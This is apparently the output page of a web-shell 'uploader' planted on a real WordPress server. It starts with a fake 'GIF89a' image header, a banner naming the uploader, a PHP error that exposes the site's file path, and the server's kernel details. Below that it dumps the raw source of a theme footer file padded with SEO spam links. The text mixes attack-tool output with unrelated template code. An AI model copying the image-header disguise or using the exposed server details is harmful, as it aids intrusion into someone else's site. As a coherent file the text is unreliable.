GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3
Priv8 Uploader By InMyMine7
Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
<?php global $theme; ?>
<div id="footer-wrap" class="span-24">
<div id="footer">
<div id="copyrights">
<?php
if($theme->display('footer_custom_text')) {
$theme->option('footer_custom_text');
} else {
?> © <?php echo date('Y'); ?> <a href="<?php bloginfo('url'); ?>/"><?php bloginfo('name'); ?></a>. <?php _e('All Rights Reserved.', 'themater');
}
?>
</div>
</div>
</div>
</div>
<?php /*
All links in the footer should remain intact.
These links are all family friendly and will not hurt your site in any way.
Warning! Your site may stop working if these links are edited or deleted
You can buy this theme without footer links online at http://fthemes.com/buy/?theme=bright
*/ ?>
<div id="credits">Powered by <a href="http://wordpress.org/"><strong>WordPress</strong></a> | Designed by: <a href="http://www.seo.us.com">seo company</a> | Thanks to <a href="http://www.seo.us.com/seo-services">seo services</a>, <a href="http://www.seocompany.biz">seo company</a> and <a href="http://seo-company-services.co.uk">seo company</a></div><!-- #credits -->
</div><!-- #wrapper -->
<?php wp_footer(); ?>
<?php $theme->hook('html_after'); ?>
</body>
</html>